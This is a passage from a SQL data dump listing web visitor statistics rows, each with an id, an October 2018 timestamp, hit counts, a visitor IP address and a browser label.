9419,1,1,0,0,'54.36.149.61','other'),(312465,1538729438,1,1,0,0,'37.17.172.132','firefox'),(312466,1538729450,1,1,0,0,'54.36.148.188','other'),(312467,1538729548,1,1,0,0,'54.36.149.62','other'),(312468,1538729906,1,1,0,0,'54.36.149.99','other'),(312469,1538729964,1,1,0,0,'54.36.149.14','other'),(312470,1538730569,1,1,0,0,'54.36.148.253','other'),(312471,1538730712,1,1,0,0,'54.36.148.185','other'),(312472,1538730790,1,1,0,0,'54.36.148.96','other'),(312473,1538731118,1,1,0,0,'54.36.148.54','other'),(312474,1538731127,1,1,0,0,'54.36.149.77','other'),(312475,1538731235,1,1,0,0,'54.36.148.143','other'),(312476,1538731291,1,1,0,0,'178.154.244.11','other'),(312477,1538731476,1,1,0,0,'54.36.149.76','other'),(312478,1538731564,1,1,0,0,'54.36.148.43','other'),(312479,1538731607,1,1,0,0,'54.36.148.200','other'),(312480,1538732242,1,1,0,0,'54.36.148.79','other'),(312481,1538732371,2,2,0,0,'46.219.57.138','chrome'),(312482,1538732554,1,1,0,0,'54.36.148.218','other'),(312483,1538732667,1,1,0,0,'216.244.66.241','other'),(312484,1538733125,1,1,0,0,'8.29.198.26','other'),(312485,1538733437,1,1,0,0,'91.196.178.165','chrome'),(312486,1538733442,1,1,0,0,'54.36.148.205','other'),(312487,1538733472,1,1,0,0,'54.36.148.181','other'),(312488,1538733644,1,1,0,0,'173.252.95.3','other'),(312489,1538733957,1,1,0,0,'37.53.228.75','chrome'),(312490,1538734049,1,1,0,0,'54.36.148.27','other'),(312491,1538734060,1,1,0,0,'46.219.57.138','chrome'),(312492,1538734104,1,1,0,0,'54.36.148.231','other'),(312493,1538734443,1,1,0,0,'54.36.148.38','other'),(312494,1538734713,1,1,0,0,'54.36.149.57','other'),(312495,1538734959,1,1,0,0,'54.36.148.178','other'),(312496,1538734991,1,1,0,0,'54.36.148.127','other'),(312497,1538735035,1,1,0,0,'66.249.69.144','chrome'),(312498,1538735222,1,1,0,0,'54.36.148.28','other'),(312499,1538735430,2,2,0,0,'46.219.57.138','chrome'),(312500,1538735683,1,1,0,0,'178.154.244.11','other'),(312501,1538735993,1,1,0,0,'54.36.148.108','other'),(312502,1538736161,5,5,0,0,'178.154.244.29','other'),(312503,1538736213,1,1,0,0,'54.36.149.8','other'),(312504,1538736467,2,2,0,0,'5.45.207.19','other'),(312505,1538736572,1,1,0,0,'54.36.148.26','other'),(312506,1538736693,1,1,0,0,'185.158.113.140','firefox'),(312507,1538736697,1,1,0,0,'54.36.148.218','other'),(312508,1538736816,1,1,0,0,'54.36.148.229','other'),(312509,1538736909,3,3,0,0,'178.154.244.11','other'),(312510,1538736987,2,2,0,0,'216.244.66.241','other'),(312511,1538737153,1,1,0,0,'54.36.149.67','other'),(312512,1538737159,1,1,0,0,'54.36.149.32','other'),(312513,1538737215,4,4,0,0,'178.154.244.29','other'),(312514,1538737813,1,1,0,0,'54.36.148.206','other'),(312515,1538737899,1,1,0,0,'54.36.148.165','other'),(312516,1538738192,1,1,0,0,'54.36.149.51','other'),(312517,1538738221,1,1,0,0,'180.76.15.25','other'),(312518,1538738258,1,1,0,0,'54.36.149.71','other'),(312519,1538738279,1,1,0,0,'54.36.148.222','other'),(312520,1538739082,1,1,0,0,'8.29.198.27','other'),(312521,1538739411,2,2,0,0,'216.244.66.241','other'),(312522,1538739432,3,3,0,0,'91.196.178.169','chrome'),(312523,1538739445,1,1,0,0,'8.29.198.26','other'),(312524,1538739699,1,1,0,0,'54.36.149.41','other'),(312525,1538739732,1,1,0,0,'193.110.112.162','chrome'),(312526,1538739867,1,1,0,0,'54.36.148.99','other'),(312527,1538740141,1,1,0,0,'54.36.149.81','other'),(312528,1538740226,1,1,0,0,'54.36.148.122','other'),(312529,1538740299,1,1,0,0,'193.142.219.177','other'),(312530,1538740432,1,1,0,0,'54.36.148.80','other'),(312531,1538740694,1,1,0,0,'178.154.244.29','other'),(312532,1538740753,1,1,0,0,'54.36.148.225','other'),(312533,1538740814,1,1,0,0,'54.36.148.183','other'),(312534,1538740827,1,1,0,0,'54.36.148.133','other'),(312535,1538740863,1,1,0,0,'66.249.69.217','chrome'),(312536,1538741014,1,1,0,0,'54.36.148.184','other'),(312537,1538741104,1,1,0,0,'54.36.148.149','other'),(312538,1538741163,1,1,0,0,'54.36.149.45','other'),(312539,1538741165,1,1,0,0,'54.36.148.218','other'),(312540,1538741274,1,1,0,0,'91.196.178.169','chrome'),(312541,1538741308,1,1,0,0,'54.36.149.2','other'),(312542,1538741335,1,1,0,0,'37.55.115.182','chrome'),(312543,1538741360,1,1,0,0,'54.36.148.22','other'),(312544,1538741373,1,1,0,0,'54.36.148.23','other'),(312545,1538741592,1,1,0,0,'54.36.148.48','other'),(312546,1538741637,1,1,0,0,'54.36.148.141','other'),(312547,1538741666,1,1,0,0,'66.249.69.219','chrome'),(312548,1538741997,1,1,0,0,'54.36.148.241','other'),(312549,1538742061,1,1,0,0,'54.36.148.158','other'),(312550,1538742135,1,1,0,0,'54.36.148.13','other'),(312551,1538742173,1,1,0,0,'185.245.85.229','chrome'),(312552,1538742263,2,2,0,0,'91.196.178.74','chrome'),(312553,1538742274,2,2,0,0,'94.179.147.128','chrome'),(312554,1538742680,1,1,0,0,'54.36.149.0','other'),(312555,1538742841,1,1,0,0,'54.36.148.16','other'),(312556,1538743105,1,1,0,0,'54.36.148.159','other'),(312557,1538743446,1,1,0,0,'66.102.9.38','chrome'),(312558,1538743462,1,1,0,0,'40.77.167.8','other'),(312559,1538743866,1,1,0,0,'54.36.148.89','other'),(312560,1538743868,1,1,0,0,'91.196.178.167','chrome'),(312561,1538743929,1,1,0,0,'54.36.148.75','other'),(312562,1538743939,1,1,0,0,'216.244.66.241','other'),(312563,1538743955,1,1,0,0,'8.29.198.25','other'),(312564,1538744169,1,1,0,0,'66.249.69.219','chrome'),(312565,1538744249,1,1,0,0,'66.249.69.221','chrome'),(312566,1538744347,1,1,0,0,'54.36.149.64','other'),(312567,1538744385,1,1,0,0,'54.36.149.0','other'),(312568,1538744452,1,1,0,0,'91.196.178.71','chrome'),(312569,1538744470,1,1,0,0,'54.36.149.107','other'),(312570,1538744525,1,1,0,0,'54.36.148.54','other'),(312571,1538745357,1,1,0,0,'216.244.66.241','other'),(312572,1538745499,1,1,0,0,'37.17.172.132','firefox'),(312573,1538745600,1,1,0,0,'180.76.15.9','other'),(312574,1538745602,2,2,0,0,'91.209.11.236','other'),(312575,1538745620,1,1,0,0,'54.36.148.226','other'),(312576,1538745948,1,1,0,0,'66.249.69.221','chrome'),(312577,1538746129,1,1,0,0,'157.55.39.232','other'),(312578,1538746361,1,1,0,0,'54.36.149.68','other'),(312579,1538746386,5,5,0,0,'46.118.155.165','other'),(312580,1538746472,1,1,0,0,'54.36.148.174','other'),(312581,1538746491,1,1,0,0,'54.36.148.159','other'),(312582,1538746727,1,1,0,0,'54.36.148.252','other'),(312583,1538746881,1,1,0,0,'54.36.149.24','other'),(312584,1538746979,1,1,0,0,'54.36.149.92','other'),(312585,1538747041,1,1,0,0,'54.36.148.78','other'),(312586,1538747085,1,1,0,0,'82.145.208.59','other'),(312587,1538747336,1,1,0,0,'54.36.148.181','other'),(312588,1538747430,1,1,0,0,'54.36.149.89','other'),(312589,1538747714,1,1,0,0,'91.209.11.236','other'),(312590,1538747947,1,1,0,0,'216.244.66.241','other'),(312591,1538748125,1,1,0,0,'218.66.74.35','other'),(312592,1538748171,1,1,0,0,'54.36.148.38','other'),(312593,1538748499,1,1,0,0,'54.36.149.64','other'),(312594,1538749184,1,1,0,0,'54.36.148.184','other'),(312595,1538749323,1,1,0,0,'54.36.148.75','other'),(312596,1538749440,1,1,0,0,'178.154.244.29','other'),(312597,1538749761,1,1,0,0,'54.36.148.23','other'),(312598,1538749881,1,1,0,0,'5.188.210.53','chrome'),(312599,1538749915,1,1,0,0,'54.36.148.131','other'),(312600,1538749916,2,2,0,0,'8.29.198.26','other'),(312601,1538749958,1,1,0,0,'54.36.148.111','other'),(312602,1538750074,1,1,0,0,'54.36.149.104','other'),(312603,1538750106,1,1,0,0,'54.36.149.45','other'),(312604,1538750128,2,2,0,0,'213.179.252.88','chrome'),(312605,1538750147,1,1,0,0,'54.36.148.73','other'),(312606,1538750386,2,2,0,0,'54.36.149.48','other'),(312607,1538750450,1,1,0,0,'54.36.149.15','other'),(312608,1538750494,1,1,0,0,'54.36.148.197','other'),(312609,1538750526,1,1,0,0,'54.36.149.41','other'),(312610,1538750542,1,1,0,0,'91.196.178.129','chrome'),(312611,1538750733,1,1,0,0,'54.36.148.105','other'),(312612,1538750852,1,1,0,0,'54.36.149.19','other'),(312613,1538750886,1,1,0,0,'54.36.149.5','other'),(312614,1538750970,1,1,0,0,'54.36.148.216','other'),(312615,1538751110,1,1,0,0,'54.36.148.45','other'),(312616,1538751271,1,1,0,0,'157.55.39.124','other'),(312617,1538751365,1,1,0,0,'54.36.148.99','other'),(312618,1538751581,1,1,0,0,'54.36.148.79','other'),(312619,1538751815,1,1,0,0,'54.36.148.46','other'),(312620,1538751831,1,1,0,0,'54.36.148.55','other'),(312621,1538751887,1,1,0,0,'54.36.149.13','other'),(312622,1538752015,1,1,0,0,'188.230.43.254','other'),(312623,1538752142,1,1,0,0,'54.36.149.22','other'),(312624,1538752580,1,1,0,0,'157.55.39.124','other'),(312625,1538752644,2,2,0,0,'66.249.69.144','chrome'),(312626,1538752652,3,3,0,0,'66.249.69.143','chrome'),(312627,1538753121,1,1,0,0,'54.36.148.205','other'),(312628,1538753122,1,1,0,0,'54.36.148.232','other'),(312629,1538753497,2,2,0,0,'54.36.148.148','other'),(312630,1538753549,1,1,0,0,'54.36.148.213','other'),(312631,1538753791,1,1,0,0,'54.36.148.224','other'),(312632,1538753833,1,1,0,0,'207.46.13.161','other'),(312633,1538753875,1,1,0,0,'54.36.149.95','other'),(312634,1538753938,1,1,0,0,'54.36.148.170','other'),(312635,1538754123,2,2,0,0,'216.244.66.241','other'),(312636,1538754247,1,1,0,0,'180.76.15.20','other'),(312637,1538754381,1,1,0,0,'188.230.43.254','other'),(312638,1538754791,1,1,0,0,'8.29.198.26','other'),(312639,1538755047,1,1,0,0,'54.36.148.129','other'),(312640,1538755055,1,1,0,0,'178.154.244.29','other'),(312641,1538755258,1,1,0,0,'54.36.148.150','other'),(312642,1538755685,1,1,0,0,'54.36.149.50','other'),(312643,1538755832,1,1,0,0,'66.249.69.219','chrome'),(312644,1538756170,1,1,0,0,'54.36.148.185','other'),(312645,1538756225,1,1,0,0,'54.36.149.39','other'),(312646,1538756237,1,1,0,0,'95.163.255.92','other'),(312647,1538756364,1,1,0,0,'54.36.148.27','other'),(312648,1538756593,1,1,0,0,'54.36.148.230','other'),(312649,1538756664,1,1,0,0,'54.36.148.30','other'),(312650,1538756786,1,1,0,0,'188.230.43.254','other'),(312651,1538757113,1,1,0,0,'54.36.148.125','other'),(312652,1538757125,1,1,0,0,'54.36.149.3','other'),(312653,1538757324,1,1,0,0,'54.36.148.62','other'),(312654,1538757436,1,1,0,0,'54.36.148.190','other'),(312655,1538757667,1,1,0,0,'54.36.148.83','other'),(312656,1538757959,1,1,0,0,'178.154.244.11','other'),(312657,1538758022,1,1,0,0,'54.36.148.97','other'),(312658,1538758074,1,1,0,0,'5.45.207.79','other'),(312659,1538758180,1,1,0,0,'54.36.148.174','other'),(312660,1538758241,1,1,0,0,'54.36.148.196','other'),(312661,1538758333,8,8,0,0,'157.55.39.124','other'),(312662,1538758343,5,5,0,0,'207.46.13.161','other'),(312663,1538758349,5,5,0,0,'157.55.39.159','other'),(312664,1538758365,1,1,0,0,'78.111.190.238','chrome'),(312665,1538758368,12,12,0,0,'157.55.39.232','other'),(312666,1538758428,1,1,0,0,'54.36.148.41','other'),(312667,1538758471,1,1,0,0,'54.36.148.131','other'),(312668,1538758499,1,1,0,0,'54.36.148.46','other'),(312669,1538758632,1,1,0,0,'54.36.148.161','other'),(312670,1538758775,1,1,0,0,'54.36.149.34','other'),(312671,1538758798,1,1,0,0,'66.249.69.217','chrome'),(312672,1538759336,1,1,0,0,'216.244.66.241','other'),(312673,1538759390,1,1,0,0,'54.36.148.74','other'),(312674,1538759400,1,1,0,0,'54.36.148.152','other'),(312675,1538759464,1,1,0,0,'157.55.39.124','other'),(312676,1538759654,1,1,0,0,'91.196.178.92','firefox'),(312677,1538759997,1,1,0,0,'54.36.148.190','other'),(312678,1538760083,2,2,0,0,'54.36.149.85','other'),(312679,1538760124,1,1,0,0,'54.36.148.115','other'),(312680,1538760294,1,1,0,0,'37.17.172.132','firefox'),(312681,1538760302,1,1,0,0,'185.11.31.195','other'),(312682,1538760409,1,1,0,0,'54.36.148.166','other'),(312683,1538760421,1,1,0,0,'54.36.148.201','other'),(312684,1538760544,1,1,0,0,'54.36.148.68','other'),(312685,1538760580,1,1,0,0,'54.36.148.121','other'),(312686,1538760584,1,1,0,0,'54.36.148.205','other'),(312687,1538760742,1,1,0,0,'8.29.198.27','other'),(312688,1538760948,1,1,0,0,'54.36.149.51','other'),(312689,1538761119,1,1,0,0,'8.29.198.26','other'),(312690,1538761165,1,1,0,0,'54.36.148.158','other'),(312691,1538761202,1,1,0,0,'54.36.149.26','other'),(312692,1538761569,1,1,0,0,'54.36.148.203','other'),(312693,1538761836,1,1,0,0,'54.36.148.239','other'),(312694,1538762123,1,1,0,0,'54.36.148.191','other'),(312695,1538762293,1,1,0,0,'157.55.39.232','other'),(312696,1538762346,1,1,0,0,'54.36.148.232','other'),(312697,1538762455,1,1,0,0,'54.36.148.28','other'),(312698,1538762753,1,1,0,0,'54.36.148.50','other'),(312699,1538763041,1,1,0,0,'54.36.148.116','other'),(312700,1538763214,1,1,0,0,'54.36.149.97','other'),(312701,1538763314,1,1,0,0,'54.36.148.82','other'),(312702,1538763352,1,1,0,0,'54.36.148.33','other'),(312703,1538763516,1,1,0,0,'130.180.208.222','firefox'),(312704,1538763534,1,1,0,0,'91.196.178.72','firefox'),(312705,1538763708,1,1,0,0,'213.179.252.88','chrome'),(312706,1538763764,1,1,0,0,'54.36.148.156','other'),(312707,1538763850,1,1,0,0,'54.36.148.164','other'),(312708,1538764036,1,1,0,0,'54.36.148.90','other'),(312709,1538764070,1,1,0,0,'54.36.148.162','other'),(312710,1538764661,1,1,0,0,'54.36.148.161','other'),(312711,1538765080,1,1,0,0,'18.196.18.95','other'),(312712,1538765503,1,1,0,0,'66.249.69.143','chrome'),(312713,1538765511,2,2,0,0,'66.249.69.219','chrome'),(312714,1538765547,1,1,0,0,'54.36.148.253','other'),(312715,1538765625,1,1,0,0,'8.29.198.25','other'),(312716,1538765667,1,1,0,0,'54.36.148.125','other'),(312717,1538765854,1,1,0,0,'66.249.69.217','chrome'),(312718,1538765875,1,1,0,0,'54.36.148.235','other'),(312719,1538765886,1,1,0,0,'66.249.66.157','chrome'),(312720,1538765945,1,1,0,0,'66.249.69.221','chrome'),(312721,1538765959,1,1,0,0,'54.36.148.215','other'),(312722,1538766528,1,1,0,0,'216.244.66.241','other'),(312723,1538766850,1,1,0,0,'207.46.13.161','other'),(312724,1538767063,1,1,0,0,'54.36.148.51','other'),(312725,1538767158,1,1,0,0,'54.36.148.91','other'),(312726,1538767240,1,1,0,0,'54.36.148.131','other'),(312727,1538767372,1,1,0,0,'54.36.148.241','other'),(312728,1538767439,1,1,0,0,'54.36.149.60','other'),(312729,1538768278,1,1,0,0,'54.36.149.57','other'),(312730,1538768422,1,1,0,0,'54.36.148.24','other'),(312731,1538768588,1,1,0,0,'54.36.148.234','other'),(312732,1538768651,1,1,0,0,'54.36.149.69','other'),(312733,1538769035,1,1,0,0,'54.36.149.81','other'),(312734,1538769102,1,1,0,0,'178.154.244.29','other'),(312735,1538769300,1,1,0,0,'207.46.13.161','other'),(312736,1538769378,1,1,0,0,'54.36.149.41','other'),(312737,1538769464,3,3,0,0,'66.249.66.155','chrome'),(312738,1538769940,1,1,0,0,'54.36.149.9','other'),(312739,1538770258,1,1,0,0,'54.36.148.86','other'),(312740,1538770329,1,1,0,0,'54.36.149.68','other'),(312741,1538770523,1,1,0,0,'54.36.148.239','other'),(312742,1538770586,1,1,0,0,'54.36.148.20','other'),(312743,1538770692,1,1,0,0,'54.36.149.47','other'),(312744,1538770704,1,1,0,0,'66.249.66.157','chrome'),(312745,1538770834,1,1,0,0,'54.36.148.213','other'),(312746,1538770920,1,1,0,0,'54.36.149.38','other'),(312747,1538771332,1,1,0,0,'157.55.39.100','other'),(312748,1538771498,1,1,0,0,'54.36.149.30','other'),(312749,1538771564,1,1,0,0,'8.29.198.26','other'),(312750,1538771738,1,1,0,0,'54.36.148.195','other'),(312751,1538771887,1,1,0,0,'54.36.148.163','other'),(312752,1538771959,1,1,0,0,'8.29.198.25','other'),(312753,1538771970,1,1,0,0,'54.36.149.52','other'),(312754,1538771988,2,2,0,0,'66.249.66.156','chrome'),(312755,1538772116,1,1,0,0,'54.36.148.85','other'),(312756,1538772130,1,1,0,0,'66.249.66.61','chrome'),(312757,1538772160,1,1,0,0,'54.36.148.157','other'),(312758,1538772409,1,1,0,0,'54.36.148.138','other'),(312759,1538772516,1,1,0,0,'54.36.148.249','other'),(312760,1538772523,1,1,0,0,'54.36.148.183','other'),(312761,1538772604,1,1,0,0,'54.36.148.253','other'),(312762,1538772623,1,1,0,0,'54.36.148.33','other'),(312763,1538772654,2,2,0,0,'54.36.148.73','other'),(312764,1538773058,1,1,0,0,'54.36.149.17','other'),(312765,1538773206,1,1,0,0,'207.46.13.161','other'),(312766,1538773241,1,1,0,0,'54.36.148.105','other'),(312767,1538773644,1,1,0,0,'91.209.11.236','other'),(312768,1538773742,1,1,0,0,'54.36.149.40','other'),(312769,1538773869,1,1,0,0,'54.36.148.22','other'),(312770,1538773994,1,1,0,0,'216.244.66.241','other'),(312771,1538774509,1,1,0,0,'54.36.148.249','other'),(312772,1538774602,1,1,0,0,'54.36.148.15','other'),(312773,1538774618,1,1,0,0,'54.36.149.11','other'),(312774,1538774869,1,1,0,0,'54.36.148.133','other'),(312775,1538775138,1,1,0,0,'54.36.149.18','other'),(312776,1538775431,1,1,0,0,'54.36.149.82','other'),(312777,1538775518,1,1,0,0,'54.36.149.105','other'),(312778,1538775852,1,1,0,0,'54.36.148.45','other'),(312779,1538776100,1,1,0,0,'54.36.149.69','other'),(312780,1538776146,1,1,0,0,'46.229.168.149','other'),(312781,1538776451,1,1,0,0,'8.29.198.25','other'),(312782,1538776472,2,2,0,0,'216.244.66.241','other'),(312783,1538776662,1,1,0,0,'54.36.149.96','other'),(312784,1538776745,1,1,0,0,'66.249.66.156','chrome'),(312785,1538776872,1,1,0,0,'207.46.13.161','other'),(312786,1538776881,1,1,0,0,'54.36.148.203','other'),(312787,1538776910,1,1,0,0,'54.36.149.77','other'),(312788,1538776929,1,1,0,0,'66.249.66.157','chrome'),(312789,1538776935,3,3,0,0,'66.249.66.155','chrome'),(312790,1538777122,1,1,0,0,'54.36.149.19','other'),(312791,1538777340,1,1,0,0,'66.249.66.57','chrome'),(312792,1538777350,1,1,0,0,'54.36.149.74','other'),(312793,1538777658,1,1,0,0,'54.36.148.192','other'),(312794,1538777739,1,1,0,0,'54.36.148.101','other'),(312795,1538777752,1,1,0,0,'66.249.66.61','chrome'),(312796,1538777996,1,1,0,0,'54.36.148.81','other'),(312797,1538778259,1,1,0,0,'54.36.149.17','other'),(312798,1538778279,1,1,0,0,'54.36.148.227','other'),(312799,1538778860,1,1,0,0,'54.36.149.18','other'),(312800,1538778883,2,2,0,0,'66.249.66.156','chrome'),(312801,1538779138,1,1,0,0,'54.36.148.124','other'),(312802,1538779162,2,2,0,0,'66.249.66.157','chrome'),(312803,1538779502,1,1,0,0,'54.36.149.63','other'),(312804,1538779663,1,1,0,0,'54.36.148.17','other'),(312805,1538779911,1,1,0,0,'54.36.149.60','other'),(312806,1538779933,1,1,0,0,'54.36.148.117','other'),(312807,1538780107,1,1,0,0,'54.36.149.95','other'),(312808,1538780142,1,1,0,0,'51.15.205.214','other'),(312809,1538780143,1,1,0,0,'66.249.66.155','chrome'),(312810,1538780215,1,1,0,0,'66.249.66.156','chrome'),(312811,1538780351,1,1,0,0,'54.36.148.122','other'),(312812,1538780427,1,1,0,0,'54.36.149.14','other'),(312813,1538780616,1,1,0,0,'54.36.148.181','other'),(312814,1538780954,1,1,0,0,'54.36.148.26','other'),(312815,1538781259,1,1,0,0,'54.36.148.251','other'),(312816,1538781300,4,4,0,0,'66.249.66.156','chrome'),(312817,1538781489,2,2,0,0,'66.249.66.155','chrome'),(312818,1538781506,1,1,0,0,'54.36.148.163','other'),(312819,1538781730,2,2,0,0,'66.249.66.157','chrome'),(312820,1538782197,1,1,0,0,'54.36.148.10','other'),(312821,1538782214,1,1,0,0,'54.36.148.67','other'),(312822,1538782347,1,1,0,0,'54.36.149.20','other'),(312823,1538782402,2,2,0,0,'8.29.198.27','other'),(312824,1538782414,1,1,0,0,'54.36.148.235','other'),(312825,1538782462,1,1,0,0,'54.36.148.162','other'),(312826,1538782514,3,3,0,0,'66.249.66.155','chrome'),(312827,1538782698,2,2,0,0,'66.249.66.156','chrome'),(312828,1538782713,1,1,0,0,'54.36.148.101','other'),(312829,1538782730,1,1,0,0,'54.36.148.133','other'),(312830,1538782740,1,1,0,0,'54.36.148.251','other'),(312831,1538783076,1,1,0,0,'178.154.244.29','other'),(312832,1538783393,1,1,0,0,'54.36.148.73','other'),(312833,1538783795,1,1,0,0,'54.36.149.33','other'),(312834,1538783845,1,1,0,0,'54.36.148.129','other'),(312835,1538783952,2,2,0,0,'144.76.186.38','other'),(312836,1538784015,1,1,0,0,'54.36.148.219','other'),(312837,1538784019,3,3,0,0,'66.249.66.156','chrome'),(312838,1538784024,1,1,0,0,'54.36.148.212','other'),(312839,1538784082,4,4,0,0,'66.249.66.157','chrome'),(312840,1538784245,1,1,0,0,'54.36.148.204','other'),(312841,1538784333,1,1,0,0,'54.36.148.177','other'),(312842,1538784361,1,1,0,0,'54.36.148.60','other'),(312843,1538784444,1,1,0,0,'157.55.39.159','other'),(312844,1538784792,1,1,0,0,'54.36.148.78','other'),(312845,1538784814,1,1,0,0,'54.36.148.191','other'),(312846,1538784995,3,3,0,0,'66.249.66.155','chrome'),(312847,1538785078,1,1,0,0,'54.36.148.199','other'),(312848,1538785081,1,1,0,0,'54.36.148.181','other'),(312849,1538785613,1,1,0,0,'54.36.149.85','other'),(312850,1538785707,3,3,0,0,'66.249.66.157','chrome'),(312851,1538785738,1,1,0,0,'54.36.148.168','other'),(312852,1538785783,1,1,0,0,'54.36.148.73','other'),(312853,1538785899,1,1,0,0,'54.36.148.173','other'),(312854,1538785981,65,65,0,0,'5.9.97.200','other'),(312855,1538785986,1,1,0,0,'66.249.66.156','chrome'),(312856,1538786003,1,1,0,0,'54.36.148.56','other'),(312857,1538786122,1,1,0,0,'207.46.13.161','other'),(312858,1538786157,1,1,0,0,'54.36.148.32','other'),(312859,1538786468,1,1,0,0,'54.36.148.109','other'),(312860,1538786521,1,1,0,0,'66.249.66.155','chrome'),(312861,1538786841,3,3,0,0,'66.249.66.157','chrome'),(312862,1538786921,1,1,0,0,'37.9.113.148','other'),(312863,1538786926,1,1,0,0,'51.255.65.46','other'),(312864,1538787041,1,1,0,0,'37.9.113.20','other'),(312865,1538787208,2,2,0,0,'178.154.244.29','other'),(312866,1538787250,2,2,0,0,'216.244.66.241','other'),(312867,1538787277,1,1,0,0,'54.36.148.135','other'),(312868,1538787283,1,1,0,0,'8.29.198.25','other'),(312869,1538787286,2,2,0,0,'54.36.148.58','other'),(312870,1538787298,1,1,0,0,'54.36.148.132','other'),(312871,1538787445,2,2,0,0,'87.250.224.47','other'),(312872,1538787487,1,1,0,0,'54.36.148.100','other'),(312873,1538787670,1,1,0,0,'178.154.244.11','other'),(312874,1538787747,1,1,0,0,'193.106.30.98','firefox'),(312875,1538787811,1,1,0,0,'66.249.66.61','chrome'),(312876,1538788112,1,1,0,0,'54.36.148.48','other'),(312877,1538788191,1,1,0,0,'54.36.148.236','other'),(312878,1538788318,5,5,0,0,'178.154.244.29','other'),(312879,1538788371,1,1,0,0,'54.36.148.193','other'),(312880,1538788412,1,1,0,0,'54.36.148.200','other'),(312881,1538788456,1,1,0,0,'54.36.149.40','other'),(312882,1538788558,1,1,0,0,'66.249.66.156','chrome'),(312883,1538788701,1,1,0,0,'54.36.148.112','other'),(312884,1538788709,1,1,0,0,'54.36.148.122','other'),(312885,1538788739,1,1,0,0,'54.36.148.123','other'),(312886,1538788841,1,1,0,0,'178.154.244.11','other'),(312887,1538788976,1,1,0,0,'54.36.148.245','other'),(312888,1538789003,1,1,0,0,'66.249.66.157','chrome'),(312889,1538789006,2,2,0,0,'66.249.66.155','chrome'),(312890,1538789131,1,1,0,0,'5.45.207.79','other'),(312891,1538789497,1,1,0,0,'54.36.148.101','other'),(312892,1538789513,1,1,0,0,'216.244.66.241','other'),(312893,1538789590,1,1,0,0,'54.36.149.66','other'),(312894,1538789610,1,1,0,0,'157.55.39.100','other'),(312895,1538789692,1,1,0,0,'54.36.148.36','other'),(312896,1538789715,1,1,0,0,'54.36.149.106','other'),(312897,1538789856,1,1,0,0,'54.36.148.255','other'),(312898,1538789857,1,1,0,0,'54.36.149.71','other'),(312899,1538789994,1,1,0,0,'54.36.148.11','other'),(312900,1538790115,1,1,0,0,'54.36.148.249','other'),(312901,1538790134,1,1,0,0,'66.249.66.156','chrome'),(312902,1538790317,1,1,0,0,'54.36.149.105','other'),(312903,1538790602,1,1,0,0,'54.36.149.64','other'),(312904,1538790866,1,1,0,0,'54.36.148.33','other'),(312906,1538791008,1,1,0,0,'66.249.66.155','chrome'),(312907,1538791162,1,1,0,0,'54.36.148.111','other'),(312908,1538791394,1,1,0,0,'66.249.66.61','chrome'),(312909,1538791553,1,1,0,0,'54.36.148.173','other'),(312910,1538791556,1,1,0,0,'54.36.148.40','other'),(312911,1538791721,1,1,0,0,'54.36.149.8','other'),(312912,1538791758,1,1,0,0,'54.36.148.85','other'),(312913,1538791847,1,1,0,0,'54.36.148.201','other'),(312914,1538792104,1,1,0,0,'54.36.148.140','other'),(312915,1538792259,1,1,0,0,'66.249.66.157','chrome'),(312916,1538792261,1,1,0,0,'54.36.148.47','other'),(312917,1538792265,2,2,0,0,'54.36.149.85','other'),(312918,1538792283,1,1,0,0,'54.36.148.27','other'),(312919,1538792400,1,1,0,0,'54.36.148.39','other'),(312920,1538792469,1,1,0,0,'180.76.15.12','other'),(312921,1538792940,1,1,0,0,'66.249.66.155','chrome'),(312922,1538792996,1,1,0,0,'95.216.19.117','other'),(312923,1538793243,1,1,0,0,'8.29.198.25','other'),(312924,1538793357,3,3,0,0,'66.249.66.156','chrome'),(312925,1538793509,1,1,0,0,'54.36.148.205','other'),(312926,1538793626,1,1,0,0,'8.29.198.27','other'),(312927,1538793741,1,1,0,0,'66.249.66.157','chrome'),(312928,1538794010,1,1,0,0,'54.36.148.11','other'),(312929,1538794294,1,1,0,0,'37.17.172.132','firefox'),(312930,1538794466,1,1,0,0,'180.76.15.138','other'),(312931,1538794598,1,1,0,0,'54.36.148.206','other'),(312932,1538794640,1,1,0,0,'54.36.148.107','other'),(312933,1538794709,1,1,0,0,'95.163.255.96','other'),(312934,1538794745,1,1,0,0,'66.249.66.157','chrome'),(312935,1538795313,1,1,0,0,'54.36.149.62','other'),(312936,1538795398,1,1,0,0,'54.36.148.105','other'),(312937,1538795406,1,1,0,0,'54.36.148.64','other'),(312938,1538795768,1,1,0,0,'54.36.148.88','other'),(312939,1538795862,1,1,0,0,'216.244.66.241','other'),(312940,1538795935,1,1,0,0,'66.249.66.156','chrome'),(312941,1538795976,1,1,0,0,'95.163.255.98','other'),(312942,1538795996,1,1,0,0,'54.36.148.17','other'),(312943,1538796178,2,2,0,0,'66.249.66.157','chrome'),(312944,1538796228,1,1,0,0,'54.36.148.182','other'),(312945,1538796303,1,1,0,0,'54.36.148.129','other'),(312946,1538796327,1,1,0,0,'54.36.148.31','other'),(312947,1538796611,2,2,0,0,'66.249.66.155','chrome'),(312948,1538797302,1,1,0,0,'54.36.149.83','other'),(312949,1538797352,1,1,0,0,'54.36.148.74','other'),(312950,1538797400,1,0,1,0,'66.249.66.57',''),(312951,1538797477,1,1,0,0,'46.229.168.141','other'),(312952,1538797527,1,1,0,0,'54.36.148.75','other'),(312953,1538797561,1,1,0,0,'54.36.149.11','other'),(312954,1538797701,1,1,0,0,'54.36.148.96','other'),(312955,1538797710,1,1,0,0,'54.36.148.218','other'),(312956,1538797715,1,1,0,0,'66.249.66.59','chrome'),(312957,1538797754,1,1,0,0,'54.36.148.112','other'),(312958,1538797758,1,1,0,0,'66.249.66.155','chrome'),(312959,1538797886,1,1,0,0,'54.36.148.190','other'),(312960,1538797950,1,1,0,0,'54.36.148.90','other'),(312961,1538798113,1,1,0,0,'8.29.198.27','other'),(312962,1538798116,3,3,0,0,'66.249.66.157','chrome'),(312963,1538798134,1,1,0,0,'54.36.148.138','other'),(312964,1538798191,1,1,0,0,'54.36.148.15','other'),(312965,1538798465,1,1,0,0,'54.36.148.148','other'),(312966,1538798609,1,1,0,0,'54.36.149.55','other'),(312967,1538798631,1,1,0,0,'216.244.66.241','other'),(312968,1538798676,1,1,0,0,'66.249.66.155','chrome'),(312969,1538798824,1,1,0,0,'54.36.148.136','other'),(312970,1538798910,1,1,0,0,'54.36.148.255','other'),(312971,1538799262,1,1,0,0,'54.36.148.59','other'),(312972,1538799394,1,1,0,0,'54.36.148.242','other'),(312973,1538799477,1,1,0,0,'157.55.39.220','other'),(312974,1538799613,1,1,0,0,'54.36.149.53','other'),(312975,1538799806,1,1,0,0,'54.36.148.211','other'),(312976,1538799893,1,1